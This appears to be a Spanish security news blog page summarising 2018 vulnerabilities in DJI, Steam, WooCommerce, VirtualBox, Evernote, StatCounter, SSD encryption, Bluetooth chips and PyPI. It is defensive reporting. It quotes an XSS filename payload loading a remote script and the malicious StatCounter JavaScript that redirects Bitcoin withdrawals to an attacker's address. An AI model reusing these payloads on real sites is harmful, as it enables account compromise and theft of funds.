Autor: Dgeldres

¿Usas un dron DJI? Es posible que tu información sensible esté en peligro

 

 

 

 

 

 

 

 

 

 

Investigadores de CheckPoint han revelado detalles de una vulnerabilidad en la aplicación web de DJIque podría haber permitido a un atacante acceder a cuentas de usuario y sincronizar información sensible como: registros de vuelo, ubicación, vídeo de cámara en vivo y fotos tomadas.

El equipo de DJI a pesar de estar informado de esta vulnerabilidad desde marzo, no ha puesto solución a la misma hasta hace menos de dos meses.

Introducción:

La vulnerabilidad en cuestión se valía de tres ataques diferentes para conseguir acceder a las cuentas de las victimas. Vamos a explicar algunos conceptos usados durante el análisis del fallo para que se comprenda mejor:

  • Atributos de las cookies: Las cookies de sesión tienen una serie de indicadores que mejoran la seguridad de las mismas. Principalmente son tres:
    • Secure: Obliga a que la cookie se envíe solo mediante comunicaciones seguras y encriptadas.
    • HTTPOnly: Especifica que la cookie solo es accesible mediante el protocolo HTTP.
    • Same-site: Impide que el navegador envíe la cookie cuando la petición es originada desde un dominio externo. (No está relacionada con la vulnerabilidad que vamos a comentar).
  • XSS (Cross-site Scripting): Vulnerabilidad web que consiste en inyectar código JavaScript. Hay dos tipos:
    • Reflejado: Consiste en editar los valores que se pasan mediante URL.
    • Persistente: Consiste en insertar código HTML en sitios que lo permitan, de manera que este queda visible antes cualquier usuario que lo visite.

Explicación de la vulnerabilidad:

Debido a una vulnerabilidad XSS persistente en el foro de DJI, un atacante podía inyectar un enlace con código malicioso que robara las cookies de sesión de la víctima que accediera. Estas al no tener correctamente configurados los atributos Secure y HTTPOnly, permitían al atacante reutilizarlas para tomar el control de la cuenta web DJI del usuario, de las aplicaciones móviles y de la plataforma centralizada de gestión de operaciones con drones llamada DJI Flighthub.

Sin embargo, para acceder a la cuenta comprometida en las aplicaciones móviles no valía solo con los hechos mencionados. Los atacantes además debían interceptar el tráfico de la aplicación móvil, y gracias a un fallo en la configuración de la implementación SSL, y mediante un ataque de hombre en el medio (MitM) conseguían el acceso.

Recomendaciones:

A pesar de que DJI ha asegurado que no ha encontrado evidencias de que el fallo se haya estado explotando más allá de los laboratorios de CheckPoint, si eres usuario de la empresa y has dado clic en algún enlace sospechoso del foro, se lo hagas saber de inmediato al soporte técnico.

 

Más información:

Report realizado por CheckPoint:
https://research.checkpoint.com/dji-drone-vulnerability/

 

Fallo en Steam permitía generar licencias gratis ilimitadas

El fallo permitía a cualquier usuario autenticado generar claves para juegos sin que la plataforma pudiese darse cuenta

El investigador de seguridad Artem Moskowsky ha descubierto un fallo de seguridad en la plataforma de videojuegos Steam que permitía generar claves de licencia de cualquier videojuego, pudiendo venderse estos en otros portales. Valve, la empresa tras Steam, ha recompensado al descubridor del fallo con 20.000$, de los cuales 5.000$ son por no divulgar el fallo. Steam es una de las plataformas de videojuegos para PC más populares del mercado, teniendo en su haber la gran mayoría de videojuegos disponibles para ordenador.

Aunque no se han hecho públicos los detalles del fallo, según ha revelado Steam en HackerOne, éste se encontraba en la API de la plataforma para la generación de claves por las empresas asociadas, más concretamente en la ruta ‘/partnercdkeys/assignkeys/’. Utilizando un parámetro que no se ha divulgado, era posible generar claves para cualquier juego, con tal de encontrarse autenticado en la plataforma. El investigador, según ha revelado a The Register, se encontró el fallo por casualidad, pudiendo generar 36.000 claves del videojuego Portal 2. Se desconoce si el fallo ha estado siendo utilizado con anterioridad, ya que según Steam no se estaba monitorizando este componente de la API, pudiendo haberse estado utilizando para generar claves para su venta en el mercado gris, un mercado de claves de juegos de dudosa procedencia.

No es la primera vez que el Artem Moskowsky descubre un fallo en la plataforma; ya en julio de este año descubrió un SQL Injection en el fichero ‘report_xml.php’ utilizando el parámetro ‘countryFilter’, que permitía acceder a información confidencial de la base de datos, y por el que fue recompensado con 25.000$ (siendo 5.000$ también un bonus).

Es una buena noticia que empresas como Valve recompensen el trabajo realizado por los investigadores de seguridad, como ha sido el caso de Artem Moskowsky. No obstante, no podemos saber si el fallo ha estado siendo explotado anteriormente, con el impacto económico que ello conlleva. Es por ello, que es importante realizar una auditoría de todo el software en producción, y monitorizar todos los puntos de

Más información:

@mskwsky en Twitter:
https://twitter.com/mskwsky

#391217 Getting all the CD keys of any game:
https://hackerone.com/reports/391217

I found a security hole in Steam that gave me every game’s license keys and all I got was this… oh nice: $20,000:
https://www.theregister.co.uk/2018/11/09/valve_steam_key_vulnerability/

#383127 SQL Injection in report_xml.php through countryFilter parameter:
https://hackerone.com/reports/383127

Escalada de privilegios con WooCommerce en WordPress

Un conjunto de vulnerabilidades en WordPress y WooCommerce permiten una escalada de privilegios que podría afectar a los más de 4 millones de usuarios de este plugin de WordPress.

Imagen extraída de https://ldav.it/shop/servizi/assistenza-tecnica-wordpress-woocommerce/

 

WooCommerce es un complemento de comercio electrónico muy popular para WordPress, instalado por alrededor de 4 millones de usuarios y desarrollado por AutomatticLa vulnerabilidad está relacionada con el método en el que interactúa el plugin WooCommerce con WordPress, permitiendo a un atacante con acceso a una cuenta de administrador de la tienda (Shop Manager) hacerse con el control del sitio web completo.  La primera alerta se dió a finales de octubre en las notas de la última versión de WooCommerce, informando de que las versiones 3.4.5 y anteriores permitían a un administrador de la tienda malintencionado realizar una escalada de privilegios y hacerse con el control del sitio web. Esta semana, la compañía de seguridad de RIPS-Tech publicó los resultados de la investigación realizada por Simon Scannell en la que se descubrió el modo en el que dichos administradores de WooCommerce podían aprovechar la vulnerabilidad del plugin para controlar el sitio WordPress completo.

En primer lugar, el administrador de la tienda de WooCommerce puede editar los datos de los usuarios. Para ello, WordPress le asigna la capacidad “edit_users” y limita sus privilegios mediante un filtro especial de metadatos que sólo se aplica mientras el plugin WooCommerce esté activo. Esto significa que si WooCommerce es deshabilitado, la verificación de privilegios que impide a los administradores de la tienda editar los datos de cualquier usuario del sitio WordPress no se produce, permitiendo que puedan incluso modificar la contraseña de la cuenta del administrador para luego acceder como tal y controlar el sitio completo. El problema es que los roles de los usuarios se almacenan en la base de datos y existen incluso si el plugin está deshabilitado.

El problema estriba en que, en las versiones 3.4.5 y anteriores de WooCommercelos administradores de la tienda además pueden eliminar archivos. Este defecto de forma aislada supondría el riesgo de que un atacante pudiese borrar el sitio web, generando una situación similar a un ataque DoS. Generalmente, este tipo de vulnerabilidades de eliminación arbitraria de archivos no se consideran críticas, pero dado que la eliminación de ciertos archivos del plugin puede deshabilitarlo permitiendo así la modificación de la contraseña del administrador del sitio, esta cadena de ataque se convierte en un riesgo de seguridad crítico.

Por lo tanto, un administrador de la tienda malintencionado (o un atacante que haya obtenido sus datos de acceso mediante phishing o algún otro tipo de fraude) podría eliminar el archivo “woocommerce.php”, con lo que WordPressdeshabilitaría inmediatamente el plugin. En este momento, el administrador de la tienda quedaría liberado de la limitación del filtro especial de metadatos manteniendo su capacidad de editar usuarios, incluidos los datos del administrador del sitio WordPress, haciéndose con el control del sitio web completo.

Actualmente se ha resuelto de forma parcial la vulnerabilidad en la versión 3.4.6 de WooCommerce, que apareció el 11 de octubre, limitando la capacidad de modificar los usuarios por parte del administrador de la tienda a sólo aquellos que tienen la función de cliente de forma predeterminada y añadiendo una lista blanca de funciones que se puedan editar de esta forma.

Los plugins de WordPress continúan siendo su talón de Aquiles.

Explicando el 0-day de VirtualBox

0day

La vulnerabilidad permite al malware escapar de la

máquina virtual al equipo anfitrión.

El descubridor del fallo es el investigador de seguridad Sergey Zelenyuk, el cual, al estar en desacuerdo con la situación actual del mercado de Bug Bounty, decidió publicar el fallo.

Información referente al 0-day:

  • Software vulnerable: Todas las versiones de VirtualBox hasta la actualidad (5.2.20)
  • Sistema operativo anfitrión: Cualquiera.
  • Sistema operativo invitado: Cualquiera.
  • Configuración de red: Intel PRO / 1000 MT Desktop (82540EM) en modo NAT. Destacar que esta es la configuración que trae por defecto VirtualBox.

Introducción:

Antes de comenzar con la explicación de la vulnerabilidad, creo que hay que aclarar varios conceptos relacionados con el software vulnerado necesarios para el entendimiento total del fallo.

  • E1000: Hace referencia al dispositivo de red virtual Intel PRO / MT Desktop (82540EM).
  • LKM: Módulo del kernel de Linux.
  • Descriptores Tx: Los descriptores Tx o de transmisión se encargan de almacenar metainformación de los paquetes enviados a través del adaptador. Esta metainformación puede ser: el tamaño del paquete, la etiqueta VLAN, los indicadores habilitados para la segmentación TCP/IP, etc.La configuración de red utilizada en la vulnerabilidad proporciona tres tipos de descriptores Tx:
    • Legacy: Ya no se utiliza.
    • Contexto: Se encargan de establecer el tamaño máximo de paquete y la segmentación TCP/IP.
    • Datos: Contienen direcciones físicas de paquetes de red y sus tamaños.

Un punto a destacar es que normalmente, los descriptores de contexto se suministran a la tarjeta de red antes que los descriptores de datos, y en estos se debe especificar un tamaño máximo de paquete mayor que el tamaño del descriptor de datos.

Resumen de la vulnerabilidad:

Debido a la configuración de E1000 es posible, mediante el envío de una cadena de descriptores Tx específicos, conseguir un desbordamiento de búfer (comúnmente conocido como buffer overflow), el cual concluye en dos posibilidades (ambas usadas en la explotación):

  • Los datos se leerán desde el invitado en un búfer de almacenamiento dinámico.
  • Copia de datos de una longitud específica al búfer sin ninguna verificación.

Además, el exploit utilizado por Zelenyuk hace uso del LKM para cargar un sistema operativo invitado. Como se requiere escalada de privilegios para conseguir cargar el controlador en ambos sistemas, hace uso de cadenas de explotaciones publicadas en el concurso Pwn2Own.

Estas cadenas explotan un navegador que abre un sitio web malicioso en el sistema operativo invitado, el cual consigue escapar de la sandbox para obtener acceso total al anillo 3 (nivel de aplicación).

Finalmente, y gracias a vulnerabilidades conocidas, consigue escalada de privilegios para acceder al anillo 0 (nivel de kernel) donde está todo lo necesario para atacar a un hipervisor desde el sistema operativo invitado.

Vídeo de la prueba de concepto:

Recomendaciones:

En primer lugar, estar muy atentos a la espera de una nueva actualización por parte del equipo de VirtualBox que arregle este fallo.

En segundo lugar, se recomienda no utilizar la configuración de red especificada al comienzo del artículo para asegurar la seguridad del equipo anfitrión.

 

Más información:

Explicación del 0-day por parte de Sergey Zelenyuk:
https://github.com/MorteNoir1/virtualbox_e1000_0day/blob/master/README.md

Los secuestros BGP del gobierno de China

El gobierno Chino secuestró tráfico de red de usuarios de EEUU para ser redirigido hacía el país Chino.

 

 

 

La Naval War College de los Estados Unidos ha publicado un artículo en el que se evidencia como el gobierno de China (a través del proveedor de servicios China Telecom) redirigió en múltiples ocasiones el tráfico de internet de parte de los usuarios de Estados Unidos hacia China, mediante la técnica de secuestro BGP.

BGP (Border Gateway Protocol) es un protocolo clave en las comunicaciones de internet. Este protocolo es utilizado para intercambiar información de enrutamiento entre los distintos proveedores de servicios registrados en internet. Garantizando que dichas rutas estén libres de bucles y representan el camino más corto entre dos extremos de una comunicación.

En el artículo, se resalta como en 2015 Estados Unidos y China alcanzaron un acuerdo por el cual se pretendían reducir los ciberataques directos entre ambas potencias. Dicho acuerdo pareció tener impacto en el número de ataques que ambos países recibían.

Sin embargo, este acuerdo no contempla los cada vez más frecuentes ataques de secuestro BGP que suelen sufrir en general los países del oeste.

 

¿ Cómo funciona un ataque de secuestro de rutas BGP ?

Internet se basa en la interconexión de otras muchas redes de forma más o menos jerárquica. En los routers frontera de cada una de esas redes, funciona el protocolo BGP, encargado como ya hemos comentado de encaminar el tráfico por una u otra red, dependiendo de cual sea el camino más corto hasta llegar a un determinado destino.

Un ataque de secuestro BGP ocurre cuando un router frontera de una de estas redes anuncia de forma intencionada (o por un fallo de configuración) rutas pertenecientes a otra red distinta como si fuese una ruta propia.

Si esta falsa afirmación es aceptada por el resto de redes vecinas, entonces el tráfico se encaminará al atacante en lugar de su destino legítimo.

 

Más información:

“https://scholarcommons.usf.edu/cgi/viewcontent.cgi?article=1050&context=mca”

“http://redestelematicas.com/arquitectura-de-internet”

“https://es.wikipedia.org/wiki/Border_Gateway_Protocol”

XSS persistente en Evernote te abre paso a ejecutar programas en Windows

Una nueva vulnerabilidad XSS persistente en la versión de escritorio de Windows permite ejecutar programas en la máquina de la víctima de forma remota si lo combinas con otros ataques, en este caso Read Local File y Remote Command Execute.

 

evernote-og

El fallo se produce cuando un usuario añade una imagen a alguna nota. Si cambia el nombre de la imagen por código JavaScript, se ejecuta. Teniendo en cuenta que al guardar la nota queda almacenado el código JavaScript inyectado, nos encontramos con un XSS persistente.

A partir de esta vulnerabilidad es posible realizar otros ataques. Puesto que Evernote utiliza NodeWebKit para sus presentaciones de notas, es posible ejecutar un script desde un servidor remoto escrito en Node.js que lea ficheros en la máquina Windows del usuario que abra la nota en modo presentación.

><script src="http://example.org/bad-javascript.js">.jpg

Un usuario malicioso puede utilizar la opción Work Chat de Evernote para enviar la nota a la víctima y persuadirla para que la abra en modo presentación.

En una POC realizada por TonQing Zhu se muestra cómo explotando esta vulnerabilidad se pueden leer ficheros de la máquina de la víctima, en este caso el fichero ‘win.ini’ y ejecutar programas, como por ejemplo, la calculadora.

Envío de nota por Work Chat de Evernote:

El fallo ha sido clasificado como CVE-2018-18524, y fue parcheado inicialmente en Evernote para Windows 6.16.1 beta en octubre. Y la actualización con el último parche se lanzó a principios de este mes con versión 6.16.4.

Más información:

prodefence.org:
http://www.prodefence.org/xss-flaw-in-evernote-allows-attackers-to-execute-commands-and-steal-files/

movaxbx.ru:
https://movaxbx.ru/2018/11/05/evernote-for-windows-read-local-file-and-command-execute-vulnerabilities/

Secuestran el JavaScript de StatCounter para el robo de criptomonedas

Mediante un ataque de envenenamiento de caché el grupo de ciber-delincuentes han conseguido modificar el código JavaScript de StatCounter para traspasar Bitcoins desde una cartera a otra. El ataque parece estar dirigido hacia el conocido exchange ‘Gate.io’, quien afirma que ninguno de sus usuarios parece haber sido afectado.

statcounter-hijacked

StatCounter es una conocida herramienta para el análisis del tráfico web. Al rededor de 3 millones de páginas web en todo el mundo utilizan esta herramienta para obtener estadísticas sobre sus visitantes.

Investigadores de ESET descubrieron que el código JavaScript que se insertaba en las páginas de Gate.io había sido modificado. El código malicioso se encontraba en el componente ‘statcounter.com/counter/counter.js’ y trataba de interceptar y redirigir las transacciones de Bitcoin que tenían lugar en la popular plataforma de trading.

El fragmento de código introducido por los atacantes, comprueba si la URL que visita la víctima coincide con la cadena ‘myaccount/withdraw/BTC’(correspondiente a una operación de retirada de Bitcoins). En caso afirmativo, se carga otro fragmento de código incluido en ‘https://www.statconuter[.]com/c.php’. Notar que el dominio puede parecer legítimo a simple vista, pero en realidad se intercambian las letras ‘n’ y ‘u’.

myselfloc = '' + document.location;
if (myselfloc.indexOf('myaccount/withdraw/BTC') > -1) {
  var ga = document.createElement('script');
  ga.src = 'https://www.statconuter.com/c.php';
  ga.setAttribute('async', 'true');
  document.documentElement.firstChild.appendChild(ga);
}

Entre las diferentes plataformas de trading existentes, la URI ‘myaccount/withdraw/BTC’ sólo coincide con Gate.io, por lo que parece ser el principal objetivo de este ataque.

El payload introducido por el segundo componente ‘https://www.statconuter.com/c.php’ sustituye la dirección de Bitcoin de destino por la del atacante(1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad).

document.forms[0]['addr'].value = '';
document.forms[0]['amount'].value = '';
doSubmit1 = doSubmit;
doSubmit = function () {
    var a = document.getElementById('withdraw_form');
    if ($('#amount').val() > 10) {
        document.forms[0]['addr']['name'] = '';
        var s = $("");
        s.attr('value', '1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad');
        var b = $('#withdraw_form');
        b.append(s);
        a.submit();
    } else if (document.getElementById('canUse').innerText > 10) {
        document.forms[0]['addr']['name'] = '';
        var s = $("");
        s.attr('value', '1JrFLmGVk1ho1UcMPq1WYirHptcCYr2jad');
        var b = $('#withdraw_form');
        b.append(s);
        document.forms[0]['amount']['name'] = '';
        var t = $("");
        t.attr('value', Math.min(document.getElementById('canUse').innerText, document.getElementById('dayLimit').innerText));
        b.append(t);
        a.submit();
    } else {
        doSubmit1();
    }
};

Es difícil determinar cuántos bitcoins han sido transferidos a los atacantes, ya que se generan nuevas direcciones cada vez que se carga el script ‘https://www.statconuter.com/c.php’. A pesar de esto, desde Gate.io no tienen constancia de que ninguno de sus usuarios haya sido afectado.

Para introducir el script modificado, los atacantes no comprometieron ninguno de los servidores de StatCounter, sino que envenenaron la caché de CloudFlare para que se sirviera el código malicioso. CloudFlare ya advirtió de esta vulnerabilidad hace unos meses y desde Hispasec recomendamos seguir sus recomendaciones para evitar este tipo de ataques.

Más información:

Supply-chain attack on cryptocurrency exchange gate.io
https://www.welivesecurity.com/2018/11/06/supply-chain-attack-cryptocurrency-exchange-gate-io/

Descubiertos fallos en cifrado por hardware en los SSD más populares

Descubiertos fallos en cifrado por hardware en los SSD más populares

Las pruebas realizadas a varios modelos SSD tanto de Samsung como de Crucial revelan que la seguridad es insuficiente e incluso nula.

Investigadores de los Países Bajos han puesto a prueba la seguridad del cifrado por hardware de varios modelos SSD, poniendo en entredicho las medidas de cifrado incluidas en los mismos. Los modelos afectados son los Crucial MX100, MX200 y MX300, los Samsung EVO 840 y 850, y los Samsung USB T3 y T5. En caso de poseer alguno de los modelos afectados, y estar utilizando el cifrado por hardware, se recomienda cambiar a cifrado vía software. Otros modelos, sobre todo de las mismas marcas, podrían estar afectados.

Muchos fabricantes recomiendan el empleo del cifrado por hardware, al considerar que son superiores a los métodos existentes en el cifrado vía software, lo que no es necesariamente cierto. En ocasiones, puede pensarse que se está utilizando un cifrado vía software y estar empleando un cifrado vía hardware; es el caso de Microsoft Bitlocker, el cual utilizará el cifrado del disco SSD si éste tuviese este modo habilitado.

Resumen de las vulnerabilidades en los modelos afectados. Fuente: Prof Bill Buchanan OBE en Medium

Los problemas encontrados son considerados graves para la mayoría de los modelos anteriores y permiten el descifrado del disco sin necesidad de la clave del usuario. En el caso del Crucial MX300, el fallo es incluso más grave al utilizar como clave maestra un string de 32 bytes vacío. Es posible que en una futura actualización del firmware se solucionen estos fallos, pero en tal caso puede requerirse volver a cifrar el disco, dependiendo del tipo de vulnerabilidad.

Los fallos encontrados en estos modelos de SSD no suponen que el cifrado vía hardware tenga que ser necesariamente inseguro, pero sí que marcas tan populares como Samsung y Crucial no se han tomado en serio esta característica de sus productos. Para considerarse seguro, los fabricantes deben poner a prueba sus métodos de cifrado con auditorías externas y ser más transparentes acerca de su funcionamiento. En el cifrado por software, existen soluciones muy estandarizadas y probadas en la industria como pueden ser LUKS y VeraCrypt, los cuales son una alternativa fiable al cifrado vía hardware.

Más información:
Self-encrypting deception: weaknesses in the encryption of solid state drives (SSDs):
https://www.ru.nl/publish/pages/909282/draft-paper.pdf

Doh! What My Encrypted Drive Can Be Unlocked By Anyone?
https://medium.com/asecuritysite-when-bob-met-alice/doh-what-my-encrypted-drive-can-be-unlocked-by-anyone-a495f6653581

Defectos en el chip Bluetooth, exponen millones de dispositivos a ataques remotos

Recientemente se ha revelado los detalles de dos vulnerabilidades críticas en los chips Bluetooth Low Energy o BLE. Estas vulnerabilidades están integradas en millones de puntos de acceso y de dispositivos de red usados alrededor del mundo.

BleedingBit-vulnerabilidad-Bluetooth

Apodada BleedingBit, este conjunto de dos vulnerabilidades podría permitir a los atacantes ejecutar código y tomar el control total de los dispositivos vulnerables sin autenticación. En este rango de dispositivos también se incluyen dispositivos médicos como bombas de insulina, marcapasos, así como dispositivos IoT.

La primera vulnerabilidad con CVE-2018-16986 ha sido verificada en chips TI CC2640 y CC2650 que afecta a numerosos puntos de acceso Wi-Fi de Cisco y Meraki. El error aprovecha un fallo en la forma en que los chips Bluetooth analizan los datos entrantes. Básicamente se trata de una vulnerabilidad de desbordamiento de memoria intermedia que podría permitir a un atacante ejecutar código malicioso en el dispositivo. Para llevar a cabo este ataque se requiere que el atacante esté a una distancia física determinada del dispositivo, pero una vez comprometido puede tomar el control a través de la instalación de un ‘backdoor’.

La segunda vulnerabilidad con CVE-2018-7080 existe en los chips TI CC2642R2, CC2640R2, CC2640, CC2650, CC2540 y CC2541, CC2640R2, CC2640, CC2650, CC2540 y CC2541CC. También se ve afectada la serie 300 de los puntos Wi-Fi de Aruba. La vulnerabilidad se debe a un problema con la función de actualización del firmware de Texas Instruments en chips BLE llamada OAD (Over the Air Download), permitiendo a un atacante enviar una actualización maliciosa al punto de acceso seleccionado y obtener el control del dispositivo.

Texas Instrument, Cisco, Meraki y Aruba confirmaron estas vulnerabilidades y han lanzado los parches necesarios para arreglar este fallo, el cuál ya se encuentra disponible.

Más información

https://thehackernews.com/2018/11/bluetooth-chip-hacking.html
https://techcrunch.com/2018/11/01/bleedingbit-security-flaws-bluetooth-wireless-networks/?guccounter=1

Paquetes maliciosos en el repositorio de python PyPI

Se ha descubierto un total de 12 librerías maliciosas en el repositorio de Python PyPI, subidas al repositorio, usando técnicas de ‘Typosquatting’ con del popular framework de desarrollo web Django.

 

PyPI logo, extraído de https://pypi.org/

PyPI (Python Package Index) es el repositorio de librerías de Python por excelencia. El repositorio permite la descarga e instalación de los paquetes necesarios para nuestros proyectos de desarrollo de forma fácil y cómoda.

La forma de instalar los paquetes que tiene PyPI es utilizando sentencia:

python pip install <nombre_de_paquete>

Donde <nombre_de_paquete> será sustituido por el paquete que queramos instalar en nuestro proyecto.

La forma en la que los atacantes alojan código malicioso en este tipo de repositorios no es comprometiendo un paquete legítimo, sino poniendo en los repositorios oficiales paquetes fraudulentos. Para realizar este tipo de ataques se utiliza (descarga) el paquete oficial como base, y partiendo desde aquí, se va añadiendo el código malicioso, y una vez terminado, se sube al repositorio oficial con nombres similares al original. A modo de ejemplo, los paquetes encontrados fueron: ‘Diango’, ‘Djago’, ‘Dajngo’, ‘Djanga’ que fueron creados para suplantar al paquete ‘Django’.

El ataque utilizado es el denominado ‘Typosquatting’ que consiste en la utilización de nombres similares, pero con algún error ortográfico al que se quiere suplantar esperando un error tipográfico por parte de los desarrolladores.

Ejemplo del ataque ‘Typosquatting’

Los paquetes han sido detectados por un investigador con el seudónimo ‘Bertus’, el cual utilizó un sistema de escaneo automatizado que creó él mismo.

Actualmente los paquetes detectados han sido eliminados del repositorio PyPI.

 

Más información:

Encuentran 12 bibliotecas maliciosas en Python PyPI:

http://noticiasseguridad.com/tecnologia/encuentran-12-bibliotecas-maliciosas-en-python-pypi/